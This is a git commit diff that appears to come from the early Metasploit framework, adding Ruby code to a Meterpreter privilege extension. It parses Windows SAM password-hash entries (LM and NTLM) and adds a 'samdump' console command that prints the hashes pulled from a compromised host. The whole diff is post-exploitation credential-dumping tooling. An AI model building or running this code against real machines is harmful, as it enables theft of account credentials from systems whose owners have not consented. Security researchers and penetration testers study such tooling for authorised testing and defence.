sam stuff all happy

git-svn-id: file:///home/svn/incoming/trunk@3211 4d416f70-5f16-0410-b530-b9f4589650da
2024-11-12 11:52:01 +01:00 · 2005-12-13 06:12:07 +00:00 · 2005-12-13 06:12:07 +00:00 · fec5c3ebab
commit fec5c3ebab
parent 557153e01c
4 changed files with 173 additions and 1 deletions
--- a/lib/rex/post/meterpreter/extensions/priv/passwd.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/passwd.rb
@ -0,0 +1,61 @@
+#!/usr/bin/ruby
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Priv
+
+###
+#
+# This class wraps a SAM hash entry.
+#
+###
+class SamUser
+
+	#
+	# Initializes the class from a hash string like this:
+	#
+	# Administrator:500:aad3b435b51404eeaadfb435b51404ee:31d6cfe0d16de931b73c59d7e0c089c0:::
+	#
+	def initialize(hash_str)
+		self.user_name, self.user_id, self.lanman, self.ntlm = hash_str.split(/:/)
+
+		self.hash_string = hash_str
+	end
+
+	#
+	# Returns the hash string that was supplied to the constructor.
+	#
+	def to_s
+		hash_string
+	end
+
+	#
+	# The raw hash string that was passed to the class constructor.
+	#
+	attr_reader :hash_string
+	#
+	# The username from the SAM database entry.
+	#
+	attr_reader :user_name
+	#
+	# The user's unique identifier from the SAM database.
+	#
+	attr_reader :user_id
+	#
+	# The LM hash.
+	#
+	attr_reader :lanman
+	#
+	# The NTLM hash.
+	#
+	attr_reader :ntlm
+
+protected
+
+	attr_writer :hash_string, :user_name, :user_id, :lanman, :ntlm # :nodoc:
+
+end
+
+end; end; end; end; end
--- a/lib/rex/post/meterpreter/extensions/priv/priv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@ -1,6 +1,7 @@
 #!/usr/bin/ruby

 require 'rex/post/meterpreter/extensions/priv/tlv'
+require 'rex/post/meterpreter/extensions/priv/passwd'

 module Rex
 module Post
@ -39,7 +40,9 @@ class Priv < Extension
 		response = client.send_request(
 			Packet.create_request('priv_passwd_get_sam_hashes'))

-		response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/)
+		response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/).map { |hash| 
+			SamUser.new(hash)
+		}
 	end

 end
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb
@ -0,0 +1,57 @@
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# Privilege escalation extension user interface.
+#
+###
+class Console::CommandDispatcher::Priv
+
+	require 'rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd'
+
+	Klass = Console::CommandDispatcher::Priv
+
+	Dispatchers = 
+		[
+			Klass::Passwd,
+		]
+
+	include Console::CommandDispatcher
+
+	#
+	# Initializes an instance of the priv command interaction.
+	#
+	def initialize(shell)
+		super
+
+		Dispatchers.each { |d|
+			shell.enstack_dispatcher(d)
+		}
+	end
+
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+		}
+	end
+
+	#
+	# Name for this dispatcher
+	#
+	def name
+		"Privilege Escalation"
+	end
+
+end
+
+end
+end
+end
+end
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb
@ -0,0 +1,51 @@
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# The password database portion of the privilege escalation extension.
+#
+###
+class Console::CommandDispatcher::Priv::Passwd
+
+	Klass = Console::CommandDispatcher::Priv::Passwd
+
+	include Console::CommandDispatcher
+
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+			"samdump" => "Dumps the contents of the SAM database"
+		}
+	end
+
+	#
+	# Name for this dispatcher.
+	#
+	def name
+		"Priv: Password database"
+	end
+
+	#
+	# Displays the contents of the SAM database
+	#
+	def cmd_samdump(*args)
+		client.priv.sam_hashes.each { |user|
+			print_line("#{user.to_s}")
+		}
+		
+		return true
+	end
+
+end
+
+end
+end
+end
+end